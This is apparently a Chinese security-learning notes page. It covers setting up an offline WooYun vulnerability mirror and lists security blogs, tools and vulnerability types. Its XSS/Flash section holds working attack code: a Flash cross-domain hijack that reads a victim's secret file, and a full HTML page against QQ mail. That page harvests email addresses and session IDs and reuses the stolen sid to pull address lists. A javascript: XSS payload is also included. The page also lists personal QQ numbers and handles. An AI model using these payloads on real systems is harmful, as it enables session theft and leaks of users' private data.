[TOC]

0x00 前言简述

所谓工欲善其事必先利其器以下是学习网络安全必备:

• (1) Wooyun镜像站本地离线搭建:php5.6 (需要安装mysql扩展-用xampp即可注意PHP与数据库版本)

  # 乌云漏洞库
  https://pan.baidu.com/s/1oJr2eWtcgYSe1tp5o26tBw 提取码：g3l7
  # 乌云知识库
  https://github.com/SuperKieran/WooyunDrops
  
  
  #存放路径：
  phpstudy
        ├─WWW
            ├─Bugs.zip(解压后是Bugs文件夹)
                  ├─conn.php(修改里面的数据库用户名和密码)
            ├─upload(自己创建)
                    ├─10-14.zip(拖到这里解压)
                    ├─15-a.zip(拖到这里解压)
                    ├─15-b.zip(拖到这里解压)
                    ├─16.zip(拖到这里解压)
            |-static (乌云知识库)
        ├─MySQL
              ├─data
                   ├─wooyun(自己创建)
                          ├─wooyun.zip(拖到这里解压)

问题解决:

-- #(1) 开启php短标签编辑php.ini或者加上将<? ?>变成`<?php ?>`
short_open_tag = On

-- #(2) 图片不能正常显示的两种解决方法
192.168.150.130 static.loner.fm
UPDATE wooyun.bugs SET article_title = replace(article_title, 'static.loner.fm', '192.168.150.130') ;

-- #(3) 记录是否看过该篇乌云漏洞
create table record (
 id int(11) NOT NULL  PRIMARY KEY AUTO_INCREMENT,
 wybug_id longtext NOT NULL,
 rtime datetime,
 INDEX mul_index (wybug_id)
);
ALTER TABLE `record` ADD UNIQUE (`wybug_id`);

-- #(4) 记录是否看过该篇乌云知识库
create table recordbook (
 id int(11) NOT NULL  PRIMARY KEY AUTO_INCREMENT,
 page_id longtext NOT NULL,
 rtime datetime,
 INDEX mul_index (page_id)
);
ALTER TABLE `recordbook` ADD UNIQUE (`page_id`);

---

0x01 安全学习

0.安全漏洞发布网站

• https://seclists.org #Nmap与漏洞披露

1.安全相关自媒体网站

• https://www.net-square.com/

2.安全研究团队网站

• https://www.w3bsafe.cn/
• https://www.dafsec.org/

3.安全圈个人blog

• https://c1h2e1.github.io/
• https://gh0st.cn
• http://infosecflash.com/
• https://ahussam.me
• https://0xpatrik.com
• https://thehackerblog.com
• https://www.hahwul.com
• https://pentester.land
• https://www.mrwu.red
• https://byt3bl33d3r.github.io/

5.网络ID信息收集

C1h2e1-QQ1119544572-Twitter@C1h2e11
蝉鸣月下独悲凉-1921409907-Team@W3bsafe
Vulkey_Chen
0ang3el
byt3bl33d3r

---

0x02 安全工具

1.Github项目

代理翻墙
https://github.com/shadowsocks/

网络空间指纹扫描器

• https://github.com/nanshihui/Scan-T

Web安全模糊测试工具

• https://github.com/xmendez/wfuzz

Fuzz脚本字典

• https://github.com/fuzzdb-project/fuzzdb
• https://github.com/danielmiessler/SecLists

---

0x03 安全漏洞分类

1.前端漏洞

XSS-跨站脚本攻击(Cross Site Script)

描述:一种 Web 应用程序的漏洞，来自用户的不可信数据在没有验证情况下被应用程序进行了处理，没有正确转义（escape）或编码（encode）反射回浏览器，导致浏览器引擎执行了非预期代码。

• 1.XSS:

  • 存储型XSS(持久型)
  • 反射型XSS / 非持久型
  • DOM based XSS

• 2.Flash:

Flash跨域数据挟持

以图像包装的Flash文件在victim.com上传然后于attacker.com下嵌入,此时它只能在attacker.com下执行JavaScript(由于同源策略), 但是假如该Flash文件发出请求那么它可以读取到victim.com下的文件前提是crossdomain文件中允许访问的域包括了，我们上传的swf的地址域名;

<object style="height:1px;width:1px;" data="http://victim.com/user/2292/profilepicture.jpg" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=read&u=http://victim.com/secret_file.txt">
</object>

<html>
<head>
  <title>just for fun</title>
  <script>
		var test = 1;
		var sid;
		var uid;
		var resultCon = '';
		function sendToJavaScript(strData) {
			regexp = new RegExp(/([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+/g);
			if ((result = regexp.exec(strData)) != null) {
				resultCon = resultCon + 'users:  ' + result[0] + '<br />';
				while ((result = regexp.exec(strData)) != null) {
					resultCon = resultCon + 'users:  ' + result[0] + '<br />';
				}
				document.write(resultCon);
			}
			// 匹配 SID 
			var r1 = strData.match(/subtemplate=ill&sid=(.*?)&/);
			if (r1 != null) {
				sid = r1[1];
				resultCon = resultCon + 'sid:  ' + sid + '<br />';
				if (test == 1) {
					var theDiv = document.getElementById("havefun");
					var content = document.createTextNode("");
					theDiv.appendChild(content);
					theDiv.innerHTML += '<object id="myObject" width="100" height="100" allowscriptaccess="always" type="application/x-shockwave-flash" data="http://join.qq.com/upload/photo/150914/439a57750ce65071b5cdbdaf0ce3bb7e.jpg"><param name="AllowScriptAccess" value="always"><param name="flashvars" value="input=http://set1.mail.qq.com/cgi-bin/laddr_lastlist?sid=' + sid + '%26t=addr_datanew%26category=hot"></object>';
				}
				test++;
			}
		}
	</script>
</head>

<body>
  just for fun
  <div id=havefun></div>
  <object id="myObject" width="100" height="100" allowscriptaccess="always" type="application/x-shockwave-flash"
		data="http://join.qq.com/upload/photo/150914/439a57750ce65071b5cdbdaf0ce3bb7e.jpg">
    <param name="AllowScriptAccess" value="always">
    <param name="flashvars"
			value="input=http://mail.qq.com/cgi-bin/mail_spam?action=check_link%26url=http://www.baidu.com">
  </object>
</body>

</html>

<script type="text/javascript">
  //立即运行的匿名函数
	!function () {
		var closed = false,bdiv;
		var charset = document.charset || document.characterSet;
		var utf8 = ['该页面的提供者尚未完成', '实名认证', '您的访问可能存在风险'];
		var gbk = ['??ҳ????ṩ????δ???', 'ʵ????֤', '???ķ??ʿ??ܴ??ڷ???'];
		var en = ['The provider of this page is not', 'verified', 'there are risks when you visiting'];

		function banner() {
			var char = charset.toLowerCase(),
				lang = '';
			switch (true) {
				case char.indexOf('utf') == 0:
					lang = utf8;
					break;
				case char.indexOf('gb') == 0:
					lang = gbk;
					break;
				default:
					lang = en;
			}
			var _div =
				'<div style="position:fixed;_position:absolute;top:0;left:0;right:0;padding:12px;background-color:rgba(0,0,0,0.5);filter: progid:DXImageTransform.Microsoft.gradient(startcolorstr=#7F000000,endcolorstr=#7F000000);color:#fff;text-align:center;font-size:16px;font-family:simsun,serif;cursor:default;z-index:2147483647;"><p style="margin:0;padding:0;">' +
				lang[0] +
				' <a style="text-decoration:none;color:#37afe4;" target="_blank" href="http://sae.sina.com.cn/?m=faq&a=view&doc_id=22">' +
				lang[1] + '</a> ' + lang[2] +
				'</p><a style="position:absolute;right:12px;top:50%;font-size:20px;color:#fff;border:none;margin:0;padding:0;;margin-top:-10px;line-height:20px;background:none;cursor:pointer;font-family:Helvetica Neue, Helvetica, Arial, sans-serif;outline:none;">x</a></div>',
				div = document.createElement('div');
			div.innerHTML = _div;
			var close = div.getElementsByTagName('a')[1],
				x = 0,
				y = 0;
			close.onmouseover = function (event) {
				var e = event ? event : window.event;
				x = e.clientX;
				y = e.clientY;
			};
			close.onclick = function (event) {
				if (event && !event.initMouseEvent) {
					return
				}
				var e = event ? event : window.event;
				if (Math.abs(e.clientX - x) < 10 && Math.abs(e.clientY - y) < 10) {
					div.style.display = 'none';
					closed = true;
				}
			};
			return div
		}

		function t() {
			if (closed) {
				clearInterval(tt);
				return
			}
			if (bdiv && bdiv.parentNode) {
				bdiv.parentNode.removeChild(bdiv)
			}
			bdiv = banner();
			document.body.appendChild(bdiv);
		}
		t();
		var tt = setInterval(t, 5000);
	}();
</script>

POC:

<content>
<tag img="http://travel.weiyigeek.top/1/72_1.jpg" txt="" url="javascript:alert(1);"/>
</content>

CSRF

• https://github.com/TheRook/CSRF-Request-Builder

Redirect

• Redirect-ByPass:https://github.com/ak1t4/open-redirect-scanner
• Redirect-Test:https://github.com/ak1t4/open-redirect-scanner